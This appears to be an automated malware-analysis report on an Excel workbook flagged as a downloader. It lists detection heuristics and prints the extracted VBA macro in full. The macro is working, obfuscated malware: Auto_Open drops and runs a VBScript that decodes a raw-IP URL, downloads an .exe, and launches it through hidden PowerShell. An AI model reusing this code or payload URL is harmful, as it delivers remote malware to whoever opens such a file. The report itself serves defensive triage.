MALICIOUS
Risk Score: 580
Heuristics: 15
- Equation Editor OLE object (high) [OLE_EQUATION_EDITOR]: Embedded OLE object xl/embeddings/oleObject3.bin contains the Equation Editor CLSID, the legacy component exploited by CVE-2017-11882, CVE-2018-0802, and CVE-2018-0798.
- ClamAV: Xls.Downloader.Bomber-10004252-0 (critical) [CLAMAV_DETECTION]: ClamAV detected this file as malware: Xls.Downloader.Bomber-10004252-0
- Ole10Native package drops an auto-executable payload (critical) [OFFICE_PACKAGE_RISKY_FILE]: OLE Package displayName or fullPath ends in a directly auto-executable extension (a runnable binary or a script the default shell host runs on double-click). Embedding such a payload inside an Office document has no benign authoring use — it is a malware-delivery dropper.
- Embedded Office object carries macros (critical) [OFFICE_EMBEDDED_MACRO_OBJECT]: This document embeds a second Office file that itself contains a VBA macro project or an Excel 4.0 (XLM) macro sheet. Hiding a macro-bearing workbook or document inside another document — frequently under an obfuscated, non-standard part name — is a macro-smuggling technique that defeats scanners which only inspect the outer document's macro storage. No benign authoring workflow stages a hidden macro project this way.
- VBA project inside OOXML (medium, 6 related findings) [OOXML_VBA]: Document contains a VBA project — VBA macros present.
- WScript.Shell usage (critical) [OLE_VBA_WSCRIPT]: WScript.Shell usage.
  Matched line in script:
      s = s & " Set wshShell = CreateObject( ""Wscript.Shell"" ) " & vbCrLf
- VBA Base64-decoded Shell command stager (critical) [OLE_VBA_BASE64_SHELL_COMMAND_STAGER]: VBA auto-exec macro decodes Base64 string literals into command or script-launch text and executes the result with Shell. This catches cmd/cscript/PowerShell/VBS launchers hidden from plain keyword matching.
  Matched line in script:
      s = s & " Set alxmd = CreateObject(""Msxml2.DOMDocument"").CreateElement(""aux"")" & vbCrLf
- CreateObject call (high) [OLE_VBA_CREATEOBJ]: CreateObject call.
  Matched line in script:
      s = s & " Set alxmd = CreateObject(""Msxml2.DOMDocument"").CreateElement(""aux"")" & vbCrLf
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- Auto_Open macro (low) [OLE_VBA_AUTO]: Auto_Open macro.
  Matched line in script:
      Sub Auto_Open()
- Environ() call (env variable access) (low) [OLE_VBA_ENVIRON]: Environ() call (env variable access).
  Matched line in script:
      SFilename = Environ("Temp") & "\TestVBScript.vbs"
- Suspicious extracted artifact (high) [EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded OLE object (medium) [OOXML_OLE_OBJECT]: Document contains an embedded OLE object.
- Payload URL recovered from embedded OLE object (1 URL) (info) [OOXML_EMBEDDED_OBJECT_URL]: An embedded OLE object (xl/word/ppt embeddings) carries a next-stage download URL in its Ole10Native/Package stream — stored literally (incl. UTF-16) or base64-encoded — which the package-level URL sweep does not see. Surfaced as an IOC; self-validating (only real payload hosts).
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://192.3.31.212/QxzyQ6ZzP9yPweG.exe (referenced by macro)
Extracted artifacts (8)
Files carved from inside the sample during analysis.
Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 16089 bytes
SHA-256: 64646a38cf8e98a23eb22c71544f804ba2a0fc5a3df83bbf5db0c232f933f540
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub Auto_Open()
s = s & "dim grove:dim uuuuuuuuuuuu:ival(aa = ""'a"")" & vbCrLf
s = s & "Function ival(obj)" & vbCrLf
s = s & " Eval(obj)" & vbCrLf
s = s & "End function" & vbCrLf
s = s & "zEQibVIXVUEKswxvogvhtPSQTRCxYIJTYzCPwwaxxtsNMrhHOf1 = ""-9482+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" & vbCrLf
s = s & "fsdfdsfs = ""aHR0cDovLzE5Mi4zLjMxLjIxMi9ReHp5UTZaelA5eVB3ZUcuZXhl"" '100" & vbCrLf
s = s & "yulkytjtrhtjrkdsarjky =""bWFuaWZuZi5leGU="" '100" & vbCrLf
s = s & "frease = """"" & vbCrLf
s = s & "itype = ""bin.base64""" & vbCrLf
s = s & "Function ase64Decode(ByVal sBase64EncodedText, ByVal fIsUtf16LE)" & vbCrLf
s = s & " Dim sTextEncoding" & vbCrLf
s = s & " if fIsUtf16LE Then sTextEncoding = ""utf-16le"" Else sTextEncoding = ""utf-8""" & vbCrLf
s = s & " ' Use an aux. XML document with a Base64-encoded element." & vbCrLf
s = s & " ' Assigning the encoded text to .Text makes the decoded byte array" & vbCrLf
s = s & " ' available via .nodeTypedValue, which we can pass to BytesToStr()" & vbCrLf
s = s & " Set alxmd = CreateObject(""Msxml2.DOMDocument"").CreateElement(""aux"")" & vbCrLf
s = s & " alxmd.DataType = itype" & vbCrLf
s = s & " alxmd.Text = sBase64EncodedText" & vbCrLf
s = s & " ase64Decode = BytesToStr(alxmd.NodeTypedValue, sTextEncoding)" & vbCrLf
s = s & "End Function" & vbCrLf
s = s & "aaax = ""ADODB.Stream""" & vbCrLf
s = s & "function BytesToStr(ByVal byteArray, ByVal sTextEncoding)" & vbCrLf
s = s & " If LCase(sTextEncoding) = ""utf-16le"" then" & vbCrLf
s = s & " ' UTF-16 LE happens to be VBScript's internal encoding, so we can" & vbCrLf
s = s & " ' take a shortcut and use CStr() to directly convert the byte array" & vbCrLf
s = s & " ' to a string." & vbCrLf
s = s & " BytesToStr = CStr(byteArray)" & vbCrLf
s = s & " Else ' Convert the specified text encoding to a VBScript string." & vbCrLf
s = s & " ' Create a binary stream and copy the input byte array to it." & vbCrLf
s = s & " Set baax = CreateObject(aaax)" & vbCrLf
s = s & " baax.Type = 1 ' adTypeBinary" & vbCrLf
s = s & " baax.Open" & vbCrLf
s = s & " baax.Write byteArray" & vbCrLf
s = s & " ' Now change the type to text, set the encoding, and output the " & vbCrLf
s = s & " ' result as text." & vbCrLf
s = s & " baax.Position = 0" & vbCrLf
s = s & " baax.Type = 2 ' adTypeText" & vbCrLf
s = s & " baax.CharSet = sTextEncoding" & vbCrLf
s = s & " fffffffffff = baax.ReadText" & vbCrLf
s = s & " BytesToStr = fffffffffff" & vbCrLf
s = s & " baax.Close" & vbCrLf
s = s & " End If" & vbCrLf
s = s & "end function" & vbCrLf
s = s & "dfgdfgdfgd = ""ap"" + ""pData = shel"" + ""lobj""" & vbCrLf
s = s & "'MsgBox()" & vbCrLf
s = s & "dim shellobj '100" & vbCrLf
s = s & "dim wssz" & vbCrLf
s = s & "wss = ""WSc"" + ""ript.Sh""" & vbCrLf
s = s & "dim wss2" & vbCrLf
s = s & "letters = ""el""" & vbCrLf
s = s & "wss2 = letters + ""l""" & vbCrLf
s = s & "virto = ""CreateOb""" & vbCrLf
s = s & "ywrjjjjjjjjjjjjwty = wss + wss2" & vbCrLf
s = s & "strlink = ase64Decode(fsdfdsfs, False) '100" & vbCrLf
s = s & "Dim appData '100" & vbCrLf
s = s & "'MsgBox(aaaaaaaaa)'100" & vbCrLf
s = s & "set shellobj = CreateObject(ywrjjjjjjjjjjjjwty)" & vbCrLf
s = s & "fileData = dfgdfgdfgd" & vbCrLf
s = s & "fileData = fileData + "".""" & vbCrLf
s = s & "fileData = fileData + ""expandEnvironmentString""" & vbCrLf
s = s & "fileData = fileData + ""s""" & vbCrLf
s = s & "fileData = fileData + ""("""""" + ""%"" + ""APPD""+""AT"" + ""A"" + ""%"" + ""\"""")""" & vbCrLf
s = s & "'MsgBox(fileData)" & vbCrLf
s = s & "miko = ""strsaveto = app"" + ""Data""" & vbCrLf
s = s & "zzappData = shellobj.expandEnvironmentStrings("" % APPDATA %\"")" & vbCrLf
s = s & "xport = miko + "" + ase64Decode"" + ""(yulkytjtrhtjrkdsarjky, False)"" '100" & vbCrLf
s = s & "dim masmaaa" & vbCrLf
s = s & "masmaaa = ""msxm""+""l2""" & vbCrLf
s = s & "masmaaa = masmaaa + "".xml"" + ""http.3.0""" & vbCrLf
s = s & "'MsgBox(fileData)" & vbCrLf
s = s & "hrc = ""n""" & vbCrLf
s = s & "er3rerererthrrrntrntrn = xport" & vbCrLf
s = s & "hrc = hrc + ""l""" & vbCrLf
s = s & "hrc = hrc + ""oad""" & vbCrLf
s = s & "ghwrthytketuketkryumktymjkur = ""set objht"" + ""tpdownload "" + ""= createobject(masmaaa)""" & vbCrLf
s = s & "strsaveto = appData + ase64Decode(yulkytjtrhtjrkdsarjky, False)" & vbCrLf
s = s & "function fsdfsdfsdgfdg()" & vbCrLf
s = s & " Set objFSO = CreateObject( ""Scripting.FileSystemObject"" ) " & vbCrLf
s = s & " Set wshShell = CreateObject( ""Wscript.Shell"" ) " & vbCrLf
s = s & " offififii = eval(""objfsodownload.file"" + ""exists(strsaveto)"") " & vbCrLf
s = s & "end function" & vbCrLf
s = s & "vi = ""nload.filee"" + ""xists (strsaveto)""" & vbCrLf
s = s & "yyuyuy = ""t""" & vbCrLf
s = s & "te = ghwrthytketuketkryumktymjkur" & vbCrLf
s = s & "lmknk = ""li"" + ""nk"" + "", false""" & vbCrLf
s = s & "'end if rjythe fg h fgh fhg dhdg hfh'100" & vbCrLf
s = s & "quote = "" """" "" " & vbCrLf
s = s & "jrjrrarjr = """""""" + ""g"" + ""e"" + yyuyuy + quote" & vbCrLf
s = s & "set objhtxtpdownload = createobject(masmaaa)" & vbCrLf
s = s & "povmskfh32423 = ""objhtx"" + ""tpdow""+ hrc + "".o"" + ""pen ""+jrjrrarjr + "", str"" + """" + lmknk" & vbCrLf
s = s & "ahoy = povmskfh32423" & vbCrLf
s = s & "objhtxtpdownload.open ""get "" , strlink, false" & vbCrLf
s = s & "eeree = ""nd"" " & vbCrLf
s = s & "yoha = ""objhtxtpdownload."" + ""se"" + eeree'100" & vbCrLf
s = s & "objhtxtpdownload.send" & vbCrLf
s = s & "dim sfo" & vbCrLf
s = s & "oofofs = ""load.""" & vbCrLf
s = s & "osdv = ""(strsaveto) """ & vbCrLf
s = s & "mmgcb = ""deletefile """ & vbCrLf
s = s & "sfo = ""scripting.filesystemobjec"" + ""t""" & vbCrLf
s = s & "bicodo = ""set objfsodownload = createobject (sfo) '100""" & vbCrLf
s = s & "set objfsodownload = createobject(sfo) '100" & vbCrLf
s = s & "aaaaaaaal = ""onononono = objfsodow"" + vi" & vbCrLf
s = s & "bicodo = "" objfsodown""" & vbCrLf
s = s & "bicodo = bicodo + oofofs + mmgcb + osdv" & vbCrLf
s = s & "xnsf = ""uN uteghsfhs""" & vbCrLf
s = s & "onononono = eval(""objfsodownload.file"" + ""exists(strsaveto)"")" & vbCrLf
s = s & "if onononono then '100" & vbCrLf
s = s & " Eval(""objfsodownload.delet"" + ""efile(strsaveto)"")" & vbCrLf
s = s & "end if '100" & vbCrLf
s = s & "bvbvbvbbvbvbvbvbvb = objhtxtpdownload.status" & vbCrLf
s = s & "if bvbvbvbbvbvbvbvbvb = 200 then '100" & vbCrLf
s = s & " dim fffffffffgggggg '100" & vbCrLf
s = s & " dim vard1" & vbCrLf
s = s & " vard1 = ""ad""" & vbCrLf
s = s & " vard1 = vard1 + ""odb.str"" + ""eam""" & vbCrLf
s = s & " bicodo = ""set fffffffffgggggg = createobject(vard1)""" & vbCrLf
s = s & " set fffffffffgggggg = createobject(vard1)" & vbCrLf
s = s & " aa = "".""'100" & vbCrLf
s = s & " aa = aa + ""sa""'100" & vbCrLf
s = s & " aa = aa + ""ve"" '100" & vbCrLf
s = s & " aa = aa + ""tofile strsaveto"" '100" & vbCrLf
s = s & " helloworld = aa + bb '100" & vbCrLf
s = s & " ssdss = "".type = 1""" & vbCrLf
s = s & " aa2 = "".op""'100" & vbCrLf
s = s & " aa2 = aa2 + ""en""'100" & vbCrLf
s = s & "aa = ""sebody""" & vbCrLf
s = s & "ee = "".close""" & vbCrLf
s = s & " byeworld = ssdss + vbCrLf + "".open"" + vbCrLf + "".write objh""'100" & vbCrLf
s = s & " byeworld = byeworld + ""ttpdown""+""load.respon"" + aa'100" & vbCrLf
s = s & "DIM ARRHELPWIN, ARRHELPWINCHR1, ARRINTCMD, ARRTEMP, DICHELPLONG, DICHELPSHORT, DICSYSTEMFILES" & vbCrLf
s = s & "DIM BLNADDITIONAL, BLNDEBUG, BLNDEBUGLOG, BLNIGNOREBATCH, BLNNOADMIN, BLNNOHLPCHR1, BLNOVERWRITE, BLNQUIET, BLNWINDOWSONLY" & vbCrLf
s = s & "DIM INTBITSOS, INTCODEPAGE, INTOSVERSION, INTUNEXPECTEDCODEPAGE, INTVALIDARGS, I, J" & vbCrLf
s = s & "DIM COLITEMS, OBJDEBUGLOG, OBJEXEC, OBJHTMLFILE, OBJFOLDER" & vbCrLf
s = s & "DIM OBJFOLDERITEM, OBJFSO, OBJITEM, OBJKEY, OBJMATCHES, OBJMATCHES2" & vbCrLf
s = s & "DIM STRALPHABET, STRARG, STRCLASS, STRCMDINFO, STRCOMMAND, STRCOMMANDLINE, STRCOMSPEC, STRCSDVER, STRFILE, STRFILEVER" & vbCrLf
s = s & "DIM STRDEBUGLOG, STRFIRSTLETTER, STRHELPALL, STRHELPLONG, STRHELPSHORT, STRHEAD, STRHTML, STRMSG, STRNUMVER" & vbCrLf
s = s & "DIM STROSLOCL, STRPATTERN, STRPREVIOUSLETTER, STRSCRIPTENGINE, STRSCRIPTPATH, STRSCRIPTVER, STRUNKNOWNCOMMAND, STRWINVER" & vbCrLf
s = s & "CONST INTERNAL_COMMON = ""BREAK CALL CD CH""" & vbCrLf
s = s & "CONST INTERNAL_CMD_EXE = ""ASSOC COLOR ENDLOCAL FTYPE MKLINK POPD PUSHD SETLOCAL START TITLE""" & vbCrLf
s = s & "CONST INTERNAL_COMMAND_COM = ""CTTY LFNFOR LH LOADHIGH LOCK UNLOCK TRUENAME""" & vbCrLf
s = s & " varf = ""Pow"" + ""erS"" + ""hell -NoP "" + ""-sta "" + ""-No"" + ""nI -W Hid"" + ""den -Ex"" + ""ecutionP"" + ""olicy by"" + ""pass -NoLogo -command """"(New-""+ ""Object System.Net.WebClient).Download"" + ""File('"" + ase64Decode(fsdfdsfs, False) + ""','%appdata%\"" + ase64Decode(yulkytjtrhtjrkdsarjky, False) + ""');Start-Process '%appdata%\"" + ase64Decode(yulkytjtrhtjrkdsarjky, False) + ""'""""""" & vbCrLf
s = s & " Set objShell = CreateObject(""WScript.Shell"")" & vbCrLf
s = s & " tohan = ""objS"" + ""hell.E"" + ""xec(varf)""" & vbCrLf
s = s & " ival(tohan)" & vbCrLf
s = s & "set fffffffffgggggg = nothing '100" & vbCrLf
s = s & "set fffffffffgggggg = nothing '100" & vbCrLf
s = s & "end if '100" & vbCrLf
s = s & "Function Base64Encode(ByVal sText, ByVal fAsUtf16LE)" & vbCrLf
s = s & " ' Use an aux. XML document with a Base64-encoded element." & vbCrLf
s = s & " ' Assigning the byte stream (array) returned by StrToBytes() to .NodeTypedValue" & vbCrLf
s = s & " ' automatically performs Base64-encoding, whose result can then be accessed" & vbCrLf
s = s & " ' as the element's text." & vbCrLf
s = s & " Set basebase = CreateObject(""Msxml2.DOMDocument"").CreateElement(""aux"")" & vbCrLf
s = s & " basebase.DataType = ""bin.base64""" & vbCrLf
s = s & " if fAsUtf16LE then" & vbCrLf
s = s & " basebase.NodeTypedValue = StrToBytes(sText, ""utf-16le"", 2)" & vbCrLf
s = s & " else" & vbCrLf
s = s & "zEQibVIXVUEKswxvogvhtPSQTRCxYIJTYzCPwwaxxtsNMrhHOf1 = ""-9482+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" & vbCrLf
s = s & " basebase.NodeTypedValue = StrToBytes(sText, ""utf-8"", 3)" & vbCrLf
s = s & "zEQibVIXVUEKswxvogvhtPSQTRCxYIJTYzCPwwaxxtsNMrhHOf1 = ""-9482+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" & vbCrLf
s = s & " end if" & vbCrLf
s = s & " Base64Encode = .Text" & vbCrLf
s = s & "End Function" & vbCrLf
s = s & "CONST BROWSE = 1" & vbCrLf
s = s & "CONST SEARCH = 2" & vbCrLf
s = s & "CONST PLUGINS = 0" & vbCrLf
s = s & "CONST LANGUAGE = -2" & vbCrLf
s = s & "CONST SEARCHTRUE = -1" & vbCrLf
s = s & "CONST RUNMETHROUGH = -2" & vbCrLf
s = s & "CONST FORWARD = 8" & vbCrLf
s = s & "CONST PRINTERS = 1" & vbCrLf
s = s & "trjrtjhrth = ""offififii = objfsodownload.file"" + ""exists(strsaveto)""" & vbCrLf
s = s & "tgrighirh = ""c"" + ""m"" + ""d""" & vbCrLf
s = s & "fsdfsdfsdgfdg()" & vbCrLf
s = s & "function aam()" & vbCrLf
s = s & " Execute(""Set objFile = writer.Create"" + ""TextFile(outFile, True)"")" & vbCrLf
s = s & "end function" & vbCrLf
s = s & "aaaaaaaaaaa = strsaveto" & vbCrLf
s = s & "sdsdsd = ""ript.S""" & vbCrLf
s = s & "if offififii then" & vbCrLf
s = s & " opppogggd = ""WScri"" '100" & vbCrLf
s = s & " opppogggd = opppogggd + ""pt"" '100" & vbCrLf
s = s & " opppogggd = opppogggd + "".S"" '100" & vbCrLf
s = s & " pyp3545567 = ""pyp3545567 = "" '100" & vbCrLf
s = s & " pyp3545567 = pyp3545567 + ""strs"" '100" & vbCrLf
s = s & " pyp3545567 = pyp3545567 + ""av"" '100" & vbCrLf
s = s & " pyp3545567 = pyp3545567 + ""eto"" '100" & vbCrLf
s = s & " pyp3545567 = aaaaaaaaaaa" & vbCrLf
s = s & " uteghsfhs = pyp3545567 '100" & vbCrLf
s = s & " pyp354 = ""CreAte"" '100" & vbCrLf
s = s & " bicodo = ""hel""" & vbCrLf
s = s & " opppogggd = opppogggd + bicodo + ""l""" & vbCrLf
s = s & " pyp354 = pyp354 + ""Obj"" + ""ect (opppogggd)."" '100" & vbCrLf
s = s & " pyp354 = pyp354 + ""R"" '100" & vbCrLf
s = s & " bicodo = ""uN uteghsfhs""" & vbCrLf
s = s & " pyp354 = pyp354 + bicodo '100" & vbCrLf
s = s & "'MsgBox(masmaaa)" & vbCrLf
s = s & "lock = ""start """""""" """"%app""" & vbCrLf
s = s & "evjkd = ""Wsc""" & vbCrLf
s = s & "ifissb = sdsdsd" & vbCrLf
s = s & "ufufufud = ""hell""" & vbCrLf
s = s & "'MsgBox(masmaaa)" & vbCrLf
s = s & "xncdm = ifissb + ufufufud" & vbCrLf
s = s & "function jing()" & vbCrLf
s = s & " " & vbCrLf
s = s & " objFile.Write stryn" & vbCrLf
s = s & " objFile.Close" & vbCrLf
s = s & "end function" & vbCrLf
s = s & "'MsgBox(masmaaa)" & vbCrLf
s = s & "end if" & vbCrLf
s = s & "'MsgBox(""masmaaa"")" & vbCrLf
s = s & "Set writer=CreateObject(""Scri"" + ""pting.FileSystemObject"")" & vbCrLf
s = s & "outFile=""C:\programData\hrjytrj.""" & vbCrLf
s = s & "outFile = outFile + tgrighirh" & vbCrLf
s = s & "stryn = lock + ""data%\"" + ase64Decode(yulkytjtrhtjrkdsarjky, False)" & vbCrLf
s = s & "aam()" & vbCrLf
s = s & "Function aabb()" & vbCrLf
s = s & " Dim a0c0v0s0r0" & vbCrLf
s = s & "End Function" & vbCrLf
s = s & "jing()" & vbCrLf
s = s & "Set objFSO = CreateObject(""Scripting.FileSystemObject"")" & vbCrLf
s = s & "strScript = Wscript.ScriptFullName" & vbCrLf
s = s & "objFSO.DeleteFile(strScript)" & vbCrLf
SFilename = Environ("Temp") & "\TestVBScript.vbs"
intFileNum = FreeFile
Open SFilename For Output As intFileNum
Print #intFileNum, s
Close intFileNum
Set wshShell = CreateObject("Wscript.Shell")
Set proc = wshShell.exec("cscript " & SFilename & "") ' run VBScript
End Sub
Filename: ooxml_oleobject_00.bin
Kind: ooxml-ole-object
Source: OOXML embedded OLE part: xl/embeddings/oleObject2.bin
Size: 12800 bytes
SHA-256: d8bbf9a054c5490e49149b30c295f0a0e8c34d4fc219c3535d83a43171bb74d7
Detection:
  ClamAV: No threats found
  Obfuscation or payload: likely
  Static shellcode analysis recovered command string(s): Wscript.Shell" )
  Carved artifact contains 2 shell/COM execution token(s).
Filename: ooxml_oleobject_00_ole10native_00.bin
Kind: ole-package
Source: OOXML xl/embeddings/oleObject2.bin Ole10Native stream: Ole10Native
Size: 9856 bytes
SHA-256: 1b78c5ab70b6303c503310c5adf77196d61fe06c29ae7226527ece0fec76398b
Detection:
  ClamAV: No threats found
  Obfuscation or payload: likely
  Static shellcode analysis recovered command string(s): Wscript.Shell" )
  Carved artifact contains 2 shell/COM execution token(s).
Filename: ooxml_oleobject_00_ole10native_00_sc.vbs
Kind: ole-package-payload
Source: OOXML xl/embeddings/oleObject2.bin Ole10Native payload: display_name=sc.vbs; full_path=C:\Users\ECITY\AppData\Local\Temp\sc (3).vbs; temp_path=; def_file=
Size: 9514 bytes
SHA-256: 5f207587b92025311f10304b86d6083c6267fe24f18449b0c23c5459c521e3af
Detection:
  ClamAV: No threats found
  Obfuscation or payload: likely
  Carved artifact contains 2 shell/COM execution token(s).
  Carved artifact contains 4 eval/decoder/string-building token(s).
Filename: ooxml_oleobject_01.bin
Kind: ooxml-ole-object
Source: OOXML embedded OLE part: xl/embeddings/oleObject3.bin
Size: 5936 bytes
SHA-256: b925f9bcf5d095977db26483dd803975142edbca1c92fe1ab74f4b9b0c1edc84
Detection:
  ClamAV: No threats found
  Obfuscation or payload: likely
  Static shellcode analysis recovered command string(s): cmd.exe /c cscript %tmp%\sc.vbs CCCCCCCCCCCCC
Filename: ooxml_oleobject_02.bin
Kind: ooxml-ole-object
Source: OOXML embedded OLE part: xl/vbaProject.bin
Size: 38400 bytes
SHA-256: 20e99b42ea8438398959ab978410da683e1d9afc42150c8aa0c2c7366b982695
Detection:
  ClamAV: Xls.Downloader.Bomber-10004252-0
  Obfuscation or payload: likely
  Static shellcode analysis recovered command string(s): Wscript.Shell" )
  Carved artifact contains 3 shell/COM execution token(s).
Filename: emf_00.emf
Kind: ooxml-emf
Source: OOXML EMF part: xl/media/image1.emf
Size: 4968 bytes
SHA-256: 979dde2aed02f077c16ae53546c6df9eed40e8386d6db6fc36aee9f966d2cb82
Filename: emf_01.emf
Kind: ooxml-emf
Source: OOXML EMF part: xl/media/image2.emf
Size: 1536 bytes
SHA-256: 4d4d1e7b04c99dcb8e885915068ad6f74cc2333e91580cdae5ccaa00c427247f